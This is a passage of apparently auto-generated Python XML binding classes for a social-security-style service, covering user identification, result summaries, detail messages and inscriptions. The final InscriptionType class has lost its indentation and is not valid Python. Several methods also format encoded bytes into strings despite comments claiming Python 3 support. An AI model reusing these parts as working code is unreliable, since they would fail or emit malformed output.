            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        if self.Reference is not None:
            showIndent(outfile, level)
            outfile.write('Reference=%s,\n' %
                          quote_python(self.Reference).encode(ExternalEncoding))
        if self.TimeRequest is not None:
            showIndent(outfile, level)
            outfile.write('TimeRequest=%s,\n' %
                          quote_python(self.TimeRequest).encode(ExternalEncoding))

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'Reference':
            Reference_ = child_.text
            Reference_ = self.gds_validate_string(
                Reference_, node, 'Reference')
            self.Reference = Reference_
        elif nodeName_ == 'TimeRequest':
            TimeRequest_ = child_.text
            TimeRequest_ = self.gds_validate_string(
                TimeRequest_, node, 'TimeRequest')
            self.TimeRequest = TimeRequest_
            # validate type t_DateTimeUTC
            self.validate_t_DateTimeUTC(self.TimeRequest)
# end class RequestMessageType
class AuthorizedUserType(GeneratedsSuper):
    """User identification information"""
    subclass = None
    superclass = None
    def __init__(self, UserID=None, Email=None, OrgUnit=None, MatrixID=None, MatrixSubID=None):
        self.UserID = UserID
        self.Email = Email
        self.OrgUnit = OrgUnit
        self.MatrixID = MatrixID
        self.MatrixSubID = MatrixSubID
    def factory(*args_, **kwargs_):
        # Honour a registered subclass so the generated class can be extended.
        if AuthorizedUserType.subclass:
            return AuthorizedUserType.subclass(*args_, **kwargs_)
        else:
            return AuthorizedUserType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_UserID(self):
        return self.UserID
    def set_UserID(self, UserID):
        self.UserID = UserID
    def validate_t_SSIN(self, value):
        # Validate type t_SSIN, a restriction on xs:string.
        pass
    def get_Email(self):
        return self.Email
    def set_Email(self, Email):
        self.Email = Email
    def validate_t_EmailAddress(self, value):
        # Validate type t_EmailAddress, a restriction on xs:string.
        pass
    def get_OrgUnit(self):
        return self.OrgUnit
    def set_OrgUnit(self, OrgUnit):
        self.OrgUnit = OrgUnit
    def get_MatrixID(self):
        return self.MatrixID
    def set_MatrixID(self, MatrixID):
        self.MatrixID = MatrixID
    def get_MatrixSubID(self):
        return self.MatrixSubID
    def set_MatrixSubID(self, MatrixSubID):
        self.MatrixSubID = MatrixSubID
    def export(self, outfile, level, namespace_='', name_='AuthorizedUserType', namespacedef_=''):
        """Serialize this element as XML; self-close when it has no children."""
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed,
                              namespace_, name_='AuthorizedUserType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AuthorizedUserType'):
        # No XML attributes are defined for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='', name_='AuthorizedUserType', fromsubclass_=False):
        # Children are emitted in schema order; None means the element is absent.
        if self.UserID is not None:
            showIndent(outfile, level)
            outfile.write('<%sUserID>%s</%sUserID>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.UserID).encode(ExternalEncoding), input_name='UserID'), namespace_))
        if self.Email is not None:
            showIndent(outfile, level)
            outfile.write('<%sEmail>%s</%sEmail>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.Email).encode(ExternalEncoding), input_name='Email'), namespace_))
        if self.OrgUnit is not None:
            showIndent(outfile, level)
            outfile.write('<%sOrgUnit>%s</%sOrgUnit>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.OrgUnit).encode(ExternalEncoding), input_name='OrgUnit'), namespace_))
        if self.MatrixID is not None:
            showIndent(outfile, level)
            outfile.write('<%sMatrixID>%s</%sMatrixID>\n' %
                          (namespace_, self.gds_format_integer(self.MatrixID, input_name='MatrixID'), namespace_))
        if self.MatrixSubID is not None:
            showIndent(outfile, level)
            outfile.write('<%sMatrixSubID>%s</%sMatrixSubID>\n' %
                          (namespace_, self.gds_format_integer(self.MatrixSubID, input_name='MatrixSubID'), namespace_))
    def hasContent_(self):
        """Return True when at least one child element is populated."""
        if (
            self.UserID is not None or
            self.Email is not None or
            self.OrgUnit is not None or
            self.MatrixID is not None or
            self.MatrixSubID is not None
        ):
            return True
        else:
            return False
    def exportLiteral(self, outfile, level, name_='AuthorizedUserType'):
        """Write this instance to outfile as Python literal source."""
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        # No XML attributes are defined for this type.
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        if self.UserID is not None:
            showIndent(outfile, level)
            outfile.write('UserID=%s,\n' %
                          quote_python(self.UserID).encode(ExternalEncoding))
        if self.Email is not None:
            showIndent(outfile, level)
            outfile.write('Email=%s,\n' %
                          quote_python(self.Email).encode(ExternalEncoding))
        if self.OrgUnit is not None:
            showIndent(outfile, level)
            outfile.write('OrgUnit=%s,\n' %
                          quote_python(self.OrgUnit).encode(ExternalEncoding))
        if self.MatrixID is not None:
            showIndent(outfile, level)
            outfile.write('MatrixID=%d,\n' % self.MatrixID)
        if self.MatrixSubID is not None:
            showIndent(outfile, level)
            outfile.write('MatrixSubID=%d,\n' % self.MatrixSubID)
    def build(self, node):
        """Populate this instance from an ElementTree node."""
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes are defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element and store it on this instance."""
        if nodeName_ == 'UserID':
            UserID_ = child_.text
            UserID_ = self.gds_validate_string(UserID_, node, 'UserID')
            self.UserID = UserID_
            self.validate_t_SSIN(self.UserID)  # validate type t_SSIN
        elif nodeName_ == 'Email':
            Email_ = child_.text
            Email_ = self.gds_validate_string(Email_, node, 'Email')
            self.Email = Email_
            # validate type t_EmailAddress
            self.validate_t_EmailAddress(self.Email)
        elif nodeName_ == 'OrgUnit':
            OrgUnit_ = child_.text
            OrgUnit_ = self.gds_validate_string(OrgUnit_, node, 'OrgUnit')
            self.OrgUnit = OrgUnit_
        elif nodeName_ == 'MatrixID':
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            # 'except E as exp' (PEP 3110) replaces the Python-2-only
            # 'except E, exp' form; valid on Python 2.6+ and required on 3.x.
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'MatrixID')
            self.MatrixID = ival_
        elif nodeName_ == 'MatrixSubID':
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'MatrixSubID')
            self.MatrixSubID = ival_
# end class AuthorizedUserType
class ResultSummary(GeneratedsSuper):
    """Summary information about the result.  In a response
    (messageType RESPONSE | EXCEPTION) the status WARNING means the
    Information element must be consulted for details."""
    subclass = None
    superclass = None
    def __init__(self, ok=None, ReturnCode=None, Detail=None):
        self.ok = _cast(None, ok)
        self.ReturnCode = ReturnCode
        # Detail is a repeated element; never share one default list
        # between instances.
        if Detail is None:
            self.Detail = []
        else:
            self.Detail = Detail
    def factory(*args_, **kwargs_):
        # Honour a registered subclass so the generated class can be extended.
        if ResultSummary.subclass:
            return ResultSummary.subclass(*args_, **kwargs_)
        else:
            return ResultSummary(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ReturnCode(self):
        return self.ReturnCode
    def set_ReturnCode(self, ReturnCode):
        self.ReturnCode = ReturnCode
    def get_Detail(self):
        return self.Detail
    def set_Detail(self, Detail):
        self.Detail = Detail
    def add_Detail(self, value):
        self.Detail.append(value)
    def insert_Detail(self, index, value):
        # NOTE: despite the name this REPLACES the entry at `index`
        # (generated API; callers may rely on this behavior).
        self.Detail[index] = value
    def get_ok(self):
        return self.ok
    def set_ok(self, ok):
        self.ok = ok
    def validate_ResultSummaryStatusType(self, value):
        # Validate type ResultSummaryStatusType, a restriction on xs:string.
        pass
    def export(self, outfile, level, namespace_='', name_='ResultSummary', namespacedef_=''):
        """Serialize this element as XML; self-close when it has no children."""
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(
            outfile, level, already_processed, namespace_, name_='ResultSummary')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ResultSummary'):
        # 'ok' is the only XML attribute of this type.
        if self.ok is not None and 'ok' not in already_processed:
            already_processed.append('ok')
            outfile.write(' ok=%s' % (quote_attrib(self.ok), ))
    def exportChildren(self, outfile, level, namespace_='', name_='ResultSummary', fromsubclass_=False):
        if self.ReturnCode is not None:
            showIndent(outfile, level)
            outfile.write('<%sReturnCode>%s</%sReturnCode>\n' %
                          (namespace_, self.gds_format_integer(self.ReturnCode, input_name='ReturnCode'), namespace_))
        for Detail_ in self.Detail:
            Detail_.export(outfile, level, namespace_, name_='Detail')
    def hasContent_(self):
        """Return True when ReturnCode is set or any Detail entry exists."""
        if (
            self.ReturnCode is not None or
            self.Detail
        ):
            return True
        else:
            return False
    def exportLiteral(self, outfile, level, name_='ResultSummary'):
        """Write this instance to outfile as Python literal source."""
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.ok is not None and 'ok' not in already_processed:
            already_processed.append('ok')
            showIndent(outfile, level)
            outfile.write('ok = "%s",\n' % (self.ok,))
    def exportLiteralChildren(self, outfile, level, name_):
        if self.ReturnCode is not None:
            showIndent(outfile, level)
            outfile.write('ReturnCode=%d,\n' % self.ReturnCode)
        showIndent(outfile, level)
        outfile.write('Detail=[\n')
        level += 1
        for Detail_ in self.Detail:
            showIndent(outfile, level)
            outfile.write('model_.DetailMessageType(\n')
            Detail_.exportLiteral(outfile, level, name_='DetailMessageType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this instance from an ElementTree node."""
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('ok', node)
        if value is not None and 'ok' not in already_processed:
            already_processed.append('ok')
            self.ok = value
            # validate type ResultSummaryStatusType
            self.validate_ResultSummaryStatusType(self.ok)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element and store it on this instance."""
        if nodeName_ == 'ReturnCode':
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            # 'except E as exp' (PEP 3110) replaces the Python-2-only
            # 'except E, exp' form; valid on Python 2.6+ and required on 3.x.
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'ReturnCode')
            self.ReturnCode = ival_
        elif nodeName_ == 'Detail':
            obj_ = DetailMessageType.factory()
            obj_.build(child_)
            self.Detail.append(obj_)
# end class ResultSummary
class ReturnCode(GeneratedsSuper):
    """general return code. 0 = OK, 1 = WARNING, 10000 = ERROR"""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        target = ReturnCode.subclass or ReturnCode
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='ReturnCode', namespacedef_=''):
        """Serialize this element; with no content it is written self-closed."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='ReturnCode')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ReturnCode'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='ReturnCode', fromsubclass_=False):
        pass

    def hasContent_(self):
        # The schema declares no attributes or children for this element.
        return False

    def exportLiteral(self, outfile, level, name_='ReturnCode'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class ReturnCode
class InformationType(GeneratedsSuper):
    """A name/value pair carried inside a detail message."""
    subclass = None
    superclass = None

    def __init__(self, FieldName=None, FieldValue=None):
        self.FieldName = FieldName
        self.FieldValue = FieldValue

    def factory(*args_, **kwargs_):
        target = InformationType.subclass or InformationType
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_FieldName(self):
        return self.FieldName

    def set_FieldName(self, FieldName):
        self.FieldName = FieldName

    def get_FieldValue(self):
        return self.FieldValue

    def set_FieldValue(self, FieldValue):
        self.FieldValue = FieldValue

    def export(self, outfile, level, namespace_='', name_='InformationType', namespacedef_=''):
        """Serialize this element as XML; self-close when empty."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='InformationType')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        showIndent(outfile, level)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='InformationType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='InformationType', fromsubclass_=False):
        # Emit children in schema order; None means the element is absent.
        for tag, value in (('FieldName', self.FieldName), ('FieldValue', self.FieldValue)):
            if value is None:
                continue
            showIndent(outfile, level)
            encoded = self.gds_format_string(quote_xml(value).encode(ExternalEncoding), input_name=tag)
            outfile.write('<%s%s>%s</%s%s>\n' % (namespace_, tag, encoded, namespace_, tag))

    def hasContent_(self):
        return self.FieldName is not None or self.FieldValue is not None

    def exportLiteral(self, outfile, level, name_='InformationType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        for tag, value in (('FieldName', self.FieldName), ('FieldValue', self.FieldValue)):
            if value is None:
                continue
            showIndent(outfile, level)
            outfile.write('%s=%s,\n' % (tag, quote_python(value).encode(ExternalEncoding)))

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'FieldName':
            self.FieldName = self.gds_validate_string(child_.text, node, 'FieldName')
        elif nodeName_ == 'FieldValue':
            self.FieldValue = self.gds_validate_string(child_.text, node, 'FieldValue')
# end class InformationType
class FieldName(GeneratedsSuper):
    """name of the field"""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        target = FieldName.subclass or FieldName
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='FieldName', namespacedef_=''):
        """Serialize this element; with no content it is written self-closed."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='FieldName')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='FieldName'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='FieldName', fromsubclass_=False):
        pass

    def hasContent_(self):
        # The schema declares no attributes or children for this element.
        return False

    def exportLiteral(self, outfile, level, name_='FieldName'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class FieldName
class FieldValue(GeneratedsSuper):
    """value of the field"""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        target = FieldValue.subclass or FieldValue
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='FieldValue', namespacedef_=''):
        """Serialize this element; with no content it is written self-closed."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='FieldValue')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='FieldValue'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='FieldValue', fromsubclass_=False):
        pass

    def hasContent_(self):
        # The schema declares no attributes or children for this element.
        return False

    def exportLiteral(self, outfile, level, name_='FieldValue'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class FieldValue
class DetailMessageType(GeneratedsSuper):
    """One detail entry of a ResultSummary: severity, reason code,
    diagnostic text, code-list author and extra Information pairs."""
    subclass = None
    superclass = None

    # Optional string children, in schema order.
    _STRING_CHILDREN = ('Severity', 'ReasonCode', 'Diagnostic', 'AuthorCodeList')

    def __init__(self, Severity=None, ReasonCode=None, Diagnostic=None, AuthorCodeList=None, Information=None):
        self.Severity = Severity
        self.ReasonCode = ReasonCode
        self.Diagnostic = Diagnostic
        self.AuthorCodeList = AuthorCodeList
        # Repeated element: never share one default list between instances.
        self.Information = [] if Information is None else Information

    def factory(*args_, **kwargs_):
        target = DetailMessageType.subclass or DetailMessageType
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_Severity(self):
        return self.Severity

    def set_Severity(self, Severity):
        self.Severity = Severity

    def validate_SeverityType(self, value):
        # Validate type SeverityType, a restriction on xs:string.
        pass

    def get_ReasonCode(self):
        return self.ReasonCode

    def set_ReasonCode(self, ReasonCode):
        self.ReasonCode = ReasonCode

    def get_Diagnostic(self):
        return self.Diagnostic

    def set_Diagnostic(self, Diagnostic):
        self.Diagnostic = Diagnostic

    def get_AuthorCodeList(self):
        return self.AuthorCodeList

    def set_AuthorCodeList(self, AuthorCodeList):
        self.AuthorCodeList = AuthorCodeList

    def get_Information(self):
        return self.Information

    def set_Information(self, Information):
        self.Information = Information

    def add_Information(self, value):
        self.Information.append(value)

    def insert_Information(self, index, value):
        # NOTE: despite the name this REPLACES the entry at `index`
        # (generated API; callers may rely on this behavior).
        self.Information[index] = value

    def export(self, outfile, level, namespace_='', name_='DetailMessageType', namespacedef_=''):
        """Serialize this element as XML; self-close when empty."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='DetailMessageType')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        showIndent(outfile, level)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='DetailMessageType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='DetailMessageType', fromsubclass_=False):
        # String children first (schema order), then the Information list.
        for tag in self._STRING_CHILDREN:
            value = getattr(self, tag)
            if value is None:
                continue
            showIndent(outfile, level)
            encoded = self.gds_format_string(quote_xml(value).encode(ExternalEncoding), input_name=tag)
            outfile.write('<%s%s>%s</%s%s>\n' % (namespace_, tag, encoded, namespace_, tag))
        for item in self.Information:
            item.export(outfile, level, namespace_, name_='Information')

    def hasContent_(self):
        if self.Information:
            return True
        return any(getattr(self, tag) is not None for tag in self._STRING_CHILDREN)

    def exportLiteral(self, outfile, level, name_='DetailMessageType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        for tag in self._STRING_CHILDREN:
            value = getattr(self, tag)
            if value is None:
                continue
            showIndent(outfile, level)
            outfile.write('%s=%s,\n' % (tag, quote_python(value).encode(ExternalEncoding)))
        showIndent(outfile, level)
        outfile.write('Information=[\n')
        level += 1
        for item in self.Information:
            showIndent(outfile, level)
            outfile.write('model_.InformationType(\n')
            item.exportLiteral(outfile, level, name_='InformationType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'Information':
            item = InformationType.factory()
            item.build(child_)
            self.Information.append(item)
        elif nodeName_ in self._STRING_CHILDREN:
            value = self.gds_validate_string(child_.text, node, nodeName_)
            setattr(self, nodeName_, value)
            if nodeName_ == 'Severity':
                # Severity is declared as SeverityType in the schema.
                self.validate_SeverityType(self.Severity)
# end class DetailMessageType
class ReasonCode(GeneratedsSuper):
    """error code"""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        target = ReasonCode.subclass or ReasonCode
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='ReasonCode', namespacedef_=''):
        """Serialize this element; with no content it is written self-closed."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='ReasonCode')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ReasonCode'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='ReasonCode', fromsubclass_=False):
        pass

    def hasContent_(self):
        # The schema declares no attributes or children for this element.
        return False

    def exportLiteral(self, outfile, level, name_='ReasonCode'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class ReasonCode
class Diagnostic(GeneratedsSuper):
    """textual error message"""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        target = Diagnostic.subclass or Diagnostic
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='Diagnostic', namespacedef_=''):
        """Serialize this element; with no content it is written self-closed."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='Diagnostic')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='Diagnostic'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='Diagnostic', fromsubclass_=False):
        pass

    def hasContent_(self):
        # The schema declares no attributes or children for this element.
        return False

    def exportLiteral(self, outfile, level, name_='Diagnostic'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class Diagnostic
class AuthorCodeList(GeneratedsSuper):
    """organisation responsible for the reason code"""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        target = AuthorCodeList.subclass or AuthorCodeList
        return target(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='AuthorCodeList', namespacedef_=''):
        """Serialize this element; with no content it is written self-closed."""
        showIndent(outfile, level)
        extra = namespacedef_ and ' ' + namespacedef_ or ''
        outfile.write('<%s%s%s' % (namespace_, name_, extra))
        self.exportAttributes(outfile, level, [], namespace_, name_='AuthorCodeList')
        if not self.hasContent_():
            outfile.write('/>\n')
            return
        outfile.write('>\n')
        self.exportChildren(outfile, level + 1, namespace_, name_)
        outfile.write('</%s%s>\n' % (namespace_, name_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AuthorCodeList'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='AuthorCodeList', fromsubclass_=False):
        pass

    def hasContent_(self):
        # The schema declares no attributes or children for this element.
        return False

    def exportLiteral(self, outfile, level, name_='AuthorCodeList'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for element in node:
            local_name = Tag_pattern_.match(element.tag).groups()[-1]
            self.buildChildren(element, node, local_name)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class AuthorCodeList
class InscriptionType(GeneratedsSuper):
"""An inscription"""
subclass = None
superclass = None
def __init__(self, SSIN=None, OrgUnit=None, Purpose=None, Period=None, InscriptionCode=None, PhaseCode=None):
self.SSIN = SSIN
self.OrgUnit = OrgUnit
self.Purpose = Purpose
self.Period = Period
self.InscriptionCode = InscriptionCode
self.PhaseCode = PhaseCode
def factory(*args_, **kwargs_):
if InscriptionType.subclass:
return InscriptionType.subclass(*args_, **kwargs_)
else:
return InscriptionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_SSIN(self):
return self.SSIN
def set_SSIN(self, SSIN):
self.SSIN = SSIN
def validate_t_SSIN(self, value):
# Validate type t_SSIN, a restriction on xs:string.
pass
def get_OrgUnit(self):
return self.OrgUnit
def set_OrgUnit(self, OrgUnit):
self.OrgUnit = OrgUnit
def get_Purpose(self):
return self.Purpose
def set_Purpose(self, Purpose):
self.Purpose = Purpose
def get_Period(self):
return self.Period
def set_Period(self, Period):
self.Period = Period
def get_InscriptionCode(self):
return self.InscriptionCode
def set_InscriptionCode(self, InscriptionCode):
